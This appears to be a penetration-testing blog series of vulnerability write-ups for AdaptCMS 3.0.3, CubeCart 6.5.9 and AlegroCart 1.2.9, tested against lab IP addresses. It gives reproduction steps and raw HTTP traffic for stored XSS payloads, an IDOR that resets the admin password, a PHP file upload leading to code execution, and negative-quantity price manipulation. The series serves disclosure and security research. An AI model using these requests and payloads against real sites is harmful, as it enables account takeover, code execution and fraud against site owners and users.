Friday Fun Pentest Series - 29 - Stored XSS via File Upload - adaptcmsv3.0.3

Description

- It was noted that the application file upload functionality allowed SVG files to be uploaded resulting in Stored XSS

Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile" > "Avatar"
2. Click on "Choose File" and upload the following file

html-xss.html

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Alert Box Example</title>

    <script>

        // This function will be called when the page loads

        function showAlert() {

            alert("Hello! This is an alert box.");

        }

    </script>

</head>

<body onload="showAlert()">

    <h1>Welcome to the Alert Box Example</h1>

    <p>This page will show an alert box when loaded.</p>

</body>

</html>

// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1

Host: 192.168.58.131

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0

[...]

[...]

------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4

Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html"

Content-Type: text/html

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Alert Box Example</title>

    <script>

        // This function will be called when the page loads

        function showAlert() {

            alert("Hello! This is an alert box.");

        }

    </script>

</head>

<body onload="showAlert()">

    <h1>Welcome to the Alert Box Example</h1>

    <p>This page will show an alert box when loaded.</p>

</body>

</html>

------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4

Content-Disposition: form-data; name="data[_Token][fields]"

// HTTP Response

HTTP/1.1 200 OK

Date: Fri, 30 May 2025 20:15:54 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Content-Length: 15400

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

[...]

<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" /> <input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/>     <div class="clearfix"></div>

[...]

Friday Fun Pentest Series - 28 - IDOR "Change Password" Functionality - adaptcmsv3.0.3

Description

- It was noted that the application was vulnerable to IDOR via the password change functionality resulting in low privilege user being able to change the "admin" password

IDOR "Change Password" Functionality #1:

Steps to Reproduce:

1. Login as user with low privilege and visit profile page
2. Select "Edit Your Profile" and click "Submit"
3. Trap the HTTP POST request
4. Set "data[User][password]" and "data[User][password_confirm]" values "Passw0rd!"
5. Set "data[User][id]" value to "1"
6. This would change the password of the "admin" account

// HTTP POST request changing password

POST /adaptcms/users/edit HTTP/1.1

Host: 192.168.58.131

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36

[...]

[...]

4d63437ebea6a2ef6648b29cc1c43ea70600295a

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][password]"

Passw0rd!

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][password_confirm]"

Passw0rd!

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][email]"

privesc-test@test.test

------WebKitFormBoundaryDvhxmc78yz9KfFbn

Content-Disposition: form-data; name="data[User][id]"

1

------WebKitFormBoundaryDvhxmc78yz9KfFbn

[...]

// HTTP Response

HTTP/1.1 200 OK

Date: Fri, 30 May 2025 19:56:17 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Content-Length: 13925

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

// HTTP POST request logging in with admin account

POST /adaptcms/login HTTP/1.1

Host: 192.168.58.131

Content-Length: 262

Cache-Control: max-age=0

Accept-Language: en-GB,en;q=0.9

Origin: http://192.168.58.131

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36

[...]

_method=POST&data[_Token][key]=dc18f92e4d0b810c603f45f2189b220de543a972&data[User][username]=admin&data[User][password]=Passw0rd!&data[_Token][fields]=5ba74a784fe0258a12c30194ef6a09b97a86bb1d%3A&data[_Token][unlocked]=

// HTTP Response

HTTP/1.1 302 Found

Date: Fri, 30 May 2025 19:56:33 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Set-Cookie: adaptcms=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/

Set-Cookie: adaptcms=2aaosqqksob20a98viieaq8j44; expires=Mon, 02-Jun-2025 19:56:33 GMT; Max-Age=259200; path=/; HttpOnly

Location: http://192.168.58.131/adaptcms/admin

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

Friday Fun Pentest Series - 27 - Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

Description

- It was noted that the application was vulnerable to Stored XSS in the "send message" functionality

Stored XSS "Send Message" Functionality #1:

Steps to Reproduce:

1. Login as normal user and visit "Profile" > "Message" > "Send Message" 
2. In "Message" field enter the following payload "<form action="javascript:alert(1)"><input id="x" type="submit" /></form><label for="x">XSS</label>"
3. The payload would execute upon viewing the message

// HTTP POST request sending message

POST /adaptcms/messages/send HTTP/1.1

Host: 192.168.58.131

Content-Length: 591

Cache-Control: max-age=0

Accept-Language: en-GB,en;q=0.9

Origin: http://192.168.58.131

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36

[...]

_method=POST&data[_Token][key]=aabf09c7e75b47229d84deadd98c6ab65e87f979&data[Message][recipient]=admin&data[Message][title]=test&data[Message][message]=<form action="javascript:alert(1)"><input id="x" type="submit" /></form>

<p><label for="x">XSS</label></p>&data[Message][parent_id]=0&data[Message][receiver_user_id]=1&data[_Token][fields]=a989058dd1dcaad53b324c3233dfc1e8f20ba411%3AMessage.parent_id%7CMessage.receiver_user_id&data[_Token][unlocked]=

// HTTP Response

HTTP/1.1 302 Found

Date: Fri, 30 May 2025 19:01:10 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Location: http://192.168.58.131/adaptcms/messages/index/outbox

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

Friday Fun Pentest Series - 26 - Authenticated File Upload to RCE - adaptcmsv3.0.3

Description

- It was noted that the application file upload functionality was vulnerable to unrestricted file uploads resulting in RCE via webshell file upload

Authenticated File Upload to RCE #1:

Steps to Reproduce:

1. Login as admin user and visit "System" > "Appearance" > "Themes" > "Default" > "Theme Files" and choose "Add New File"
2. Select "Add File". In the "File Contents" add the following payload "<?php phpinfo(); ?>"
3. Choose "File Extension" to be "php" and set "Folder Location" to "Images"
4. Upon uploading the file it would be available under the "img" directory

// HTTP POST request

POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1

Host: 192.168.58.131

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0

[...]

[...]

------geckoformboundary648cea5cd97a776abc03a12296adaf90

Content-Disposition: form-data; name="data[Asset][filename]"; filename=""

Content-Type: application/octet-stream

------geckoformboundary648cea5cd97a776abc03a12296adaf90

Content-Disposition: form-data; name="data[Asset][content]"

<?php phpinfo(); ?>

------geckoformboundary648cea5cd97a776abc03a12296adaf90

Content-Disposition: form-data; name="data[Asset][file_extension]"

php

------geckoformboundary648cea5cd97a776abc03a12296adaf90

Content-Disposition: form-data; name="data[Asset][file_name]"

test

------geckoformboundary648cea5cd97a776abc03a12296adaf90

Content-Disposition: form-data; name="data[Asset][folder]"

img/

------geckoformboundary648cea5cd97a776abc03a12296adaf90

Content-Disposition: form-data; name="data[Asset][theme]"

[...]

// HTTP Response

HTTP/1.1 302 Found

Date: Fri, 30 May 2025 16:06:57 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

// HTTP Request triggering the webshell

GET /adaptcms/app/webroot/img/test.php HTTP/1.1

Host: 192.168.58.131

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0

[...]

// HTTP Response triggering the webshell

HTTP/1.1 200 OK

Date: Fri, 30 May 2025 16:15:36 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Keep-Alive: timeout=5, max=98

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

Content-Length: 102019

[...]

<h1 class="p">PHP Version 5.6.40</h1>

</td></tr>

</table>

<table>

<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>

<tr>

[...]

Friday Fun Pentest Series - 25 - Stored Cross Site Scripting (XSS) - cubecartv6.5.9

Description

- It was noted that the application was vulnerable to Stored Cross Site Scripting

Stored Cross Site Scripting #1:

Steps to Reproduce:

1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload <iframe><textarea></iframe><img src="" onerror="alert(document.domain)">

// HTTP POST Request

POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1

Host: 192.168.58.186

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0

[...]

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6

Content-Disposition: form-data; name="description"

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">

------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6

Content-Disposition: form-data; name="title"

[...] 

// HTTP Response

HTTP/1.1 302 Found

Date: Sun, 18 May 2025 12:16:17 GMT

Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1

X-Frame-Options: SAMEORIGIN

X-Powered-By: PHP/8.2.4

X-Frame-Options: SAMEORIGIN

Expires: Thu, 19 Nov 1981 08:52:00 GMT

[...]

// HTTP GET Request

GET /cubecart/index.php?_a=addressbook HTTP/1.1

Host: 192.168.58.186

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0

[...]

// HTTP Response

HTTP/1.1 200 OK

Date: Sun, 18 May 2025 12:16:41 GMT

Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12 Perl/v5.34.1

X-Frame-Options: SAMEORIGIN

X-Powered-By: PHP/8.2.4

X-Frame-Options: SAMEORIGIN

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday, 19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly

Vary: Accept-Encoding

Content-Length: 42139

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

[...]

<div class="small-12 columns"><h5><a href="?_a=addressbook&action=edit&address_id=1"><iframe><textarea></iframe><img src="" onerror="alert(document.domain)"></a></h5></div>

[...]

Friday Fun Pentest Series - 24 - Business Logic Flaw: Price Manipulation - alegrocartv1.2.9

Description

- The "quantity" parameter was vulnerable to business logic flaw, that affected the end price result

Business Logic Flaw: Price Manipulation #1:

Steps to Reproduce:

1. Visit the store and add a product
2. Intercept the HTTP GET request and add negative value to the "quantity" parameter

// HTTP GET request

GET /alegrocart/index.php?controller=addtocart&action=add&item=10&quantity=-100 HTTP/1.1

Host: 192.168.58.129

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0

[...]

// HTTP response

HTTP/1.1 200 OK

Date: Thu, 03 Apr 2025 22:16:58 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate

Expires: Thu, 03 Apr 2025 22:16:58 GMT

Vary: Accept-Encoding

Content-Length: 813

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

<div class="headingcolumn pointer" onclick="ShowCart()"><h3>Cart  ^</h3></div>

<div  class="cart">

<div id="cart_content" class="cart_content">

<div id="cart_products">

<table>

<tr>

<td>-100&nbsp;x&nbsp;</td>

<td class="ff"><a href="http://192.168.58.129/alegrocart/?controller=product&amp;product_id=10">Featured13/8&quot;&amp;1/2&quot;</a></td>

<td class="ee"> $-1,599.00</td>

</tr>

</table>

</div>

<div class="aa">Subtotal:$-1,599.00</div>

<div class="cc">1 Product(s) - <div class="dd">-100 Item(s)</div></div>

<div class="bb" id="cart_button"><a href="http://192.168.58.129/alegrocart/?controller=cart">View Cart</a></div>

[...]

Friday Fun Pentest Series - 23 - Stored XSS - alegrocartv1.2.9

Description

- The application lacked output encoding and as a  result of that was vulnerable to Stored XSS

Stored XSS #1:

Steps to Reproduce:

1. Login as demonstrator account and visit "Customers" > "Newsletter"
2. In "Message" use the following XSS payload

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>